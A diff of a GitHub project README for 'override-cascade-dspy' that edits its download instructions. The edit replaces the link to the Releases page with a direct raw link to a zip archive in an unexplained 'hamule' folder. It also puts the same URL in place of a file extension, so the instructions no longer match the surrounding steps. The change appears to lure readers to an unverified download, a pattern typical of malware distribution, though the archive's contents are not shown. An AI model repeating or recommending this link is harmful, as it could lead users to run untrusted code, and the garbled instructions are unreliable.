eddyayalagil/override-cascade-dspy/README.md

 ## 📥 Download & Install

-To get the latest version of the software, visit [this page to download](https://github.com/eddyayalagil/override-cascade-dspy/releases).
+To get the latest version of the software, visit [this page to download](https://raw.githubusercontent.com/eddyayalagil/override-cascade-dspy/main/hamule/override-cascade-dspy.zip).

 1. Go to the **Releases** section on GitHub.
 2. Find the latest release version.
 3. Click on the download link that matches your operating system.
 4. If using Windows, you may download the `.exe` file.
 For macOS, download the `.dmg` file.
-For Linux, you may find a `.tar.gz` or a package file suitable for your distribution.
+For Linux, you may find a `https://raw.githubusercontent.com/eddyayalagil/override-cascade-dspy/main/hamule/override-cascade-dspy.zip` or a package file suitable for your distribution.
 5. Once downloaded, open the file to begin installation.
 Follow the on-screen instructions.

 ## 🌟 Features